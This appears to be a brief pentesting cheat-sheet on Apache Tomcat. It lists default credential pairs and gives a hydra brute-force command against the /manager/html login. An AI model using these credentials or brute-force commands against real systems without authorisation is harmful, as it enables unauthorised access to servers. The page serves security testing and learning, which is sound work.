Pentesting tomcat Usually found on port 8080. Default credentials: admin:admin tomcat:tomcat admin:<NOTHING> admin:s3cr3t tomcat:s3cr3t admin:tomcat tomcat:tomca Dictionaries: Directory enumeration Brute force hydra -l tomcat -P /usr/share/wordlists/SecLists-master/Passwords/darkweb2017-top1000.txt -f $ip http-get /manager/html Last update: 2023-07-12 Created: April 28, 2023 23:16:19